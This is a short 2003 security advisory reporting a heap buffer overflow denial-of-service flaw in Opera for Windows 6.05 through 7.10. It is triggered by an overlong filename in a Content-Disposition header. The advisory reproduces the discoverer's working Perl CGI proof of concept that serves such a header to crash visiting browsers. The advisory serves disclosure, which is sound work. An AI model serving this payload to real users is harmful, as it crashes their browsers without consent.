Reported April 28, 2003, by nesumin.

 

 

VERSIONS AFFECTED

 

  • Opera for Windows 7.10 (build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b), 7.01 (build 2651), 6.06b (build 1145), 6.06 (build 1144), 6.05 (build 1140)

 

DESCRIPTION

 

<span style="font-family:Verdana">Several versions of Opera for Windows contain a Denial of Service (DoS) condition. The condition results from an unchecked buffer on the heap and Opera's failure to check the length of a filename.</h3>

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

================

 

  This is a Perl script.

 

  ---------------------------------------------------------------

  #!/usr/bin/perl

  # Smash Heap Memory.

  # This script is CGI program.

 

  $|=1;

  my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

 

  print "Content-type: text/html\r\n";

  print qq~Content-Disposition: filename="$filename"\r\n~;

  print "\r\n";

  print "<html><body>Love & Peace :)</body></html>\r\n";

  ---------------------------------------------------------------

 

VENDOR RESPONSE

 

<span style="font-family:Verdana"><a href="http://www.opera.com/" style="color: blue; text-decoration: underline; text-underline: single">Opera</a> has yet to respond to this problem.</h3>

 

 

CREDIT                                                                                                       

 

Discovered by nesumin.